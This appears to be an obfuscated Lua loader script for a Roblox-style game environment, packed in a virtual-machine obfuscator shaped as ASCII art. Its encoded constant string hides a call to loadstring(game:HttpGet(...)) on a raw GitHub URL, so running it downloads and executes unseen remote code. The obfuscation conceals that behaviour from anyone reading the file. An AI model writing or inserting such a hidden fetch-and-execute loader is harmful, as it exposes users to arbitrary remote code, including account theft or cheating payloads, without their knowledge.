                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v91=v2(v0(v30,16));if    
                                                    v19 then local v112=v5(v91,v19);v19=nil;return v112;else return v91;end end end);local        
                                                  function v20(v31,v32,v33) if v33 then local v92=0 -0 ;local v93;while true do if (v92==0) then    
                                                  v93=(v31/((4 -2)^(v32-(2 -1))))%((3 -1)^(((v33-(1 + 0)) -(v32-(2 -1))) + (620 -((1025 -470) + 64))) 
                                                ) ;return v93-(v93%(932 -(857 + 74))) ;end end else local v94=568 -(367 + 201) ;local v95;while true do 
                                                 if (v94==(927 -(214 + 713))) then v95=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v95 + v95))>=v95) and (1 + 0 
                                              )) or (957 -(892 + 65)) ;end end end end local function v21() local v34=0 -0 ;local v35;while true do if (v34 
                                              ==(351 -(87 + 263))) then return v35;end if (v34==(180 -(67 + 113))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 
                                             ;v34=2 -1 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (7 -5) ;return (v37 
                                             * (1208 -(802 + 150))) + v36 ;end local function v23() local v38=(0 -0) -(0 -0) ;local v39;local v40;local v41;    
                                          local v42;while true do if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 1 + 2 + 0 );v18=v18 + (1001 -(915 + 82)) 
                                           ;v38=2 -1 ;end if (v38==((1 -0) + 0)) then return (v42 * (22064430 -5287214)) + (v41 * (66723 -(1069 + 118))) + (v40 *   
                                          256) + v39 ;end end end local function v24() local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;  
                                          while true do if (v43==(794 -(368 + 423))) then if (v48==(0 -0)) then if (v47==(18 -((1433 -(630 + 793)) + 8))) then return 
                                         v49 * 0 ;else local v121=0 -0 ;while true do if (v121==(442 -(416 + 26))) then v48=3 -2 ;v46=0 + 0 ;break;end end end elseif ( 
                                        v48==2047) then return ((v47==(0 -(0 -0))) and (v49 * ((439 -(145 +   --[[==============================]]293))/0))) or (v49 *    
                                        NaN) ;end return v8(v49,v48-(1453 -(44 + 386)) ) * (v46 + ( --[[============================================]]v47/((9 -7)^(1538 - 
                                        (998 + 193 + 295))))) ;end if (v43==(1 + 0)) then v46=1 --[[======================================================]] + (0 -0) ;v47= 
                                      (v20(v45,(2520 -(760 + 987)) -(201 + 571) ,1158 -(116 --[[==========================================================]] + 1022) ) * (((  
                                      1921 -(1789 + 124)) -6)^(19 + 13))) + v44 ;v43=7 -5 --[[==============================================================]] ;end if (v43== 
                                      (7 -5)) then v48=v20(v45,880 -(814 + 45) ,76 -45 ); --[[================================================================]]v49=((v20(v45,2 
                                       + 30 )==(1 + 0)) and  -(886 -(261 + 624))) or (1 - --[[==================================================================]]0) ;v43=1083  
                                      -(1020 + (826 -(745 + 21))) ;end if (v43==0) then   --[[==================================================================]]v44=v23();v45=    
                                    v23();v43=1;end end end local function v25(v50) local --[[====================================================================]] v51;if  not  
                    v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16 --[[====================================================================]],v18,(v18 + v50 
              ) -(1 + 0) );v18=v18 + v50 ;local v52={};for v68=1, #v51 do v52[v68]=v2(v1( --[[======================================================================]]v3(v51,v68,   
            v68)));end return v6(v52);end local v26=v23;local function v27(...) return {  --[[======================================================================]]...},v12("#", 
          ...);end local function v28() local v53=(function() return function(v96,v97,v98 --[[======================================================================]],v99,v100,    
        v101,v102,v103,v104) local v105=(function() return 280 -(272 + 8) ;end)();local   --[[======================================================================]]v96=(function 
        () return;end)();local v97=(function() return;end)();while true do if (v105~=(    --[[======================================================================]]1251 -(721 +  
      530))) then else v96=(function() return 0 + 0 ;end)();v97=(function() return nil;   --[[======================================================================]]end)();v105=( 
      function() return 1823 -(301 + 1521) ;end)();end if (v105~=(2 -1)) then else local    --[[==================================================================]]v117=(function( 
      ) return 0 -0 ;end)();while true do if (v117==0) then local v124=(function() return 0 --[[================================================================]] + 0 ;end)();     
    while true do if ((0 -0)==v124) then while true do if (v96~=(0 + 0)) then else v97=(    --[[==============================================================]]function() return 
     v98();end)();if (v99(v97, #"<", #"|")~=(0 -0)) then else local v160=(function() return   --[[==========================================================]]1700 -(1419 + 281)  
    ;end)();local v161=(function() return;end)();local v162=(function() return;end)();local     --[[====================================================]]v163=(function() return 
    ;end)();local v164=(function() return;end)();while true do if (v160~=(1 -0)) then else local  --[[==============================================]]v177=(function() return 0 
    ;end)();while true do if (v177~=(75 -(71 + 3))) then else v160=(function() return 2 + 0 ;end)();  --[[====================================]]break;end if (v177==0) then   
    v163=(function() return nil;end)();v164=(function() return nil;end)();v177=(function() return 1289 -( --[[========================]]993 + 295) ;end)();end end end if (   
    v160~=2) then else while true do if (v161==(4 -2)) then local v181=(function() return 0 -0 ;end)();while true do if (v181~=(241 -(187 + 54))) then else if (v99(v163, # 
  " ", #"!")== #":") then v164[782 -(162 + 618) ]=(function() return v100[v164[2 + 0 ]];end)();end if (v99(v163,1173 -(418 + 753) ,2 + 0 )~= #"<") then else v164[ #"nil" 
  ]=(function() return v100[v164[ #"19("]];end)();end v181=(function() return 1 + 0 ;end)();end if (v181==(1 -0)) then v161=(function() return  #"91(";end)();break;end 
   end end if (v161==(0 -0)) then local v182=(function() return 0 + 0 ;end)();local v183=(function() return;end)();while true do if (v182~=(0 + 0)) then else v183=(      
  function() return 1636 -(1373 + 263) ;end)();while true do if ((1001 -(451 + 549))==v183) then v161=(function() return  #",";end)();break;end if (v183==0) then v162=(  
  function() return v99(v97,1 + 1 , #"19(");end)();v163=(function() return v99(v97, #"0836",6);end)();v183=(function() return 1 -0 ;end)();end end break;end end end if ( 
   #"nil"==v161) then if (v99(v163, #"-19", #"xnx")== #"~") then v164[ #"?id="]=(function() return v100[v164[ #"http"]];end)();end v101[v102]=(function() return v164;end 
  )();break;end if (v161~= #"[") then else local v185=(function() return 529 -(406 + 123) ;end)();local v186=(function() return;end)();while true do if (v185==(0 -0))    
  then v186=(function() return 0;end)();while true do if ((1 + 0)==v186) then v161=(function() return 2;end)();break;end if ((1384 -(746 + 638))~=v186) then else v164=(  
  function() return {v103(),v103(),nil,nil};end)();if (v162==(0 + 0)) then local v190=(function() return 0;end)();local v191=(function() return;end)();while true do if ( 
  v190~=0) then else v191=(function() return 0 -0 ;end)();while true do if (v191~=(341 -(218 + 123))) then else v164[ #"asd"]=(function() return v103();end)();v164[ #    
  "0836"]=(function() return v103();end)();break;end end break;end end elseif (v162== #"/") then v164[ #"-19"]=(function() return v104();end)();elseif (v162==(1583 -(    
  1535 + 46))) then v164[ #"-19"]=(function() return v104() -((2 + 0)^(3 + 13)) ;end)();elseif (v162== #"gha") then local v196=(function() return 1900 -(106 + 1794) ;end)( 
  );local v197=(function() return;end)();while true do if (0~=v196) then else v197=(function() return 0;end)();while true do if (v197==(560 -(306 + 254))) then v164[ #     
  "asd"]=(function() return v104() -((1 + 1)^(1 + 15)) ;end)();v164[ #"xnxx"]=(function() return v103();end)();break;end end break;end end end v186=(function() return 1 +  
  0 ;end)();end end break;end end end end break;end if (v160~=(0 -0)) then else local v178=(function() return 0 -0 ;end)();while true do if (v178==0) then v161=(function() 
   return 0 -0 ;end)();v162=(function() return nil;end)();v178=(function() return 1468 -(899 + 568) ;end)();end if (v178==(115 -(4 + 110))) then v160=(function() return 1  
  + 0 ;end)();break;end end end end end break;end end return v96,v97,v98,v99,v100,v101,v102,v103,v104;end end end end end end end;end)();local v54=(function() return       
  function(v106,v107,v108) local v109=(function() return 0;end)();while true do if (v109==(0 -0)) then local v118=(function() return 603 -(268 + 335) ;end)();while true do 
   if (v118==(290 -(60 + 230))) then local v125=(function() return 0;end)();while true do if (v125==(103 -(17 + 86))) then v106[v107-#"[" ]=(function() return v108();end)( 
  );return v106,v107,v108;end end end end end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {}; 
  end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"}",v59 do local  
  v71=(function() return 0;end)();local v72=(function() return;end)();local v73=(function() return;end)();local v74=(function() return;end)();while true do if (v71~=(1 + 0 
  )) then else v74=(function() return nil;end)();while true do if ((573 -(426 + 146))~=v72) then else if (v73== #">") then v74=(function() return v21()~=(0 + 0) ;end)();   
  elseif (v73==(1458 -(282 + 1174))) then v74=(function() return v24();end)();elseif (v73~= #"91(") then else v74=(function() return v25();end)();end v60[v70]=(function()  
  return v74;end)();break;end if (v72==(0 -0)) then local v123=(function() return 166 -(122 + 44) ;end)();while true do if (v123==0) then v73=(function() return v21();   
  end)();v74=(function() return nil;end)();v123=(function() return 1;end)();end if (v123==1) then v72=(function() return 812 -(569 + 242) ;end)();break;end end end end   
  break;end if (v71==(0 -0)) then v72=(function() return 0 + 0 ;end)();v73=(function() return nil;end)();v71=(function() return 1025 -(706 + 318) ;end)();end end end v58 
    [ #"91("]=(function() return v21();end)();for v75= #" ",v23() do FlatIdent_C460,Descriptor,v21,v20,v60,v55,v75,v22,v23=(function() return v53(FlatIdent_C460,         
    Descriptor,v21,v20,v60,v55,v75,v22,v23);end)();end for v76= #"[",v23() do v56,v76,v28=(function() return v54(v56,v76,v28);end)();end return v58;end local function    
    v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[3 -1 ];local v67=v62[68 -(30 + 35) ];return function(...) local v77=v65;local v78=v66;local v79=v67;local v80=   
    v27;local v81=1 + 0 ;local v82= -(1 + 0);local v83={};local v84={...};local v85=v12("#",...) -(3 -2) ;local v86={};local v87={};for v110=1212 -(323 + (2352 -(1404 +  
      59))) ,v85 do if (v110>=v79) then v83[v110-v79 ]=v84[v110 + (2 -1) ];else v87[v110]=v84[v110 + (581 -(361 + (599 -380))) ];end end local v88=(v85-v79) + (321 -(  
      53 + 267)) ;local v89;local v90;while true do local v111=0;while true do if (v111==(0 + 0)) then v89=v77[v81];v90=v89[414 -(15 + 398) ];v111=983 -(18 + 964) ;end 
       if ((v111==(3 -2)) or (2232>2497)) then if ((v90<=(1940 -(565 + 1368))) or (2110<=332) or (2037>=4642)) then if (v90<=(2 + 1)) then if ((1720<4458) and (v90<=(1 
         + 0))) then if ((v90>(0 -0)) or (436>3021)) then v87[v89[852 -(20 + 830) ]]={};else local v128=v89[(1152 -294) -(564 + (1057 -(468 + 297))) ];local v129=v87[  
        v89[3 + 0 ]];v87[v128 + ((689 -(334 + 228)) -(116 + (33 -23))) ]=v129;v87[v128]=v129[v89[1 + 3 ]];end elseif ((3686>3172) and (v90>(740 -(542 + 196)))) then    
        local v133=304 -(244 + 60) ;local v134;while true do if ((v133==(0 -0)) or (4474<820)) then v134=v89[1 + 1 ];v87[v134]=v87[v134](v13(v87,v134 + 1 + 0 ,v82));   
          break;end end else do return;end end elseif (v90<=(2 + 3)) then if (v90>(10 -6)) then local v135=v89[4 -2 ];v87[v135]=v87[v135](v13(v87,v135 + ((3596 -2044 
            ) -(1126 + 425)) ,v82));else v87[v89[407 -(118 + 287) ]]();end elseif (v90==(23 -17)) then do return;end else local v137=1613 -(1565 + 48) ;local v138;   
              local v139;while true do if ((713<=847) and (v137==((1 -0) + 0))) then v87[v138 + 1 ]=v139;v87[v138]=v139[v89[1125 -(118 + 1003) ]];break;end if ((4279 
                >=2882) and (v137==0)) then v138=v89[5 -3 ];v139=v87[v89[270 -(176 + 91) ]];v137=(108 + 270) -(142 + 235) ;end end end elseif ((2154<=4031) and (v90  
                  <=(49 -38))) then if (v90<=(2 + 7)) then if (v90>((1336 -(141 + 95)) -(975 + 117))) then v87[v89[1877 -(157 + 1718) ]]=v64[v89[980 -(553 + 424) ] 
                      ];else local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==((0 + 0) -0)) then v143=v89[3 -1 ];v144,v145=v80(v87[ 
                                  v143](v13(v87,v143 + 1 + 0 ,v89[3 + (0 -0) ])));v142=2 -1 ;end if ((4615==4615) and (v142==(2 + 0))) then for v173=v143,v82 do    
                                      local v174=(0 -0) + 0 ;while true do if (v174==(0 + 0 + 0)) then v146=v146 + 1 + 0 ;v87[v173]=v144[v146];break;end end end    
                                      break;end if ((v142==(2 -(2 -1))) or (3790==500)) then v82=(          v145 + v143) -(1 + 0) ;v146=1227 -(322 + 905) ;v142=5 - 
                                      3 ;end end end elseif (v90>(22 -12)) then v87[v89[1 + 1 + 0 ]         ]();else v87[v89[9 -7 ]]=v89[756 -(239 + 514) ];end   
                                      elseif (v90<=(5 + 8)) then if (v90>((1888 -547) -(797 + 532))         ) then local v149=v89[2 + 0 ];local v150,v151=v80(v87 
                                      [v149](v13(v87,v149 + 1 + 0 + 0 ,v89[2 + 1 ])));v82=(v151 +           v149) -(2 -1) ;local v152=1202 -(373 + 829) ;for v158 
                                      =v149,v82 do local v159=731 -(476 + (418 -(92 + 71))) ;while            true do if (v159==(0 -0)) then v152=v152 + (1131 -( 
                                      369 + 761)) ;v87[v158]=v150[v152];break;end end end else v87[           v89[1207 -(902 + 303) ]]=v89[2 + 1 ];end elseif ((  
                                      89<221) and ((v90>(24 -10)) or (2029>=3521))) then v87[v89[(2            + 1) -1 ]]={};else v87[v89[240 -(64 + 174) ]]=   
                                        v64[v89[(1 -0) + 2 ]];end v81=v81 + ((980 -(574 + 191)) -(            19 + 3 + 192)) ;break;end end end end;end return  
                                        v29(v28(),{},v17)(...);end return v15(                                                                                  
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403623Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C6F6C6E6F74614B69642F4B3Q6B2Q6D2F726566732F68656164732F6D61696E2F50726F7465637465645F3630343032373136372Q342Q363534322E74787400094Q00017Q00120E000100013Q00120E000200023Q00202Q00020002000300120A000400044Q0008000200044Q000500013Q00022Q00040001000100012Q00023Q00017Q00",v9(),...);
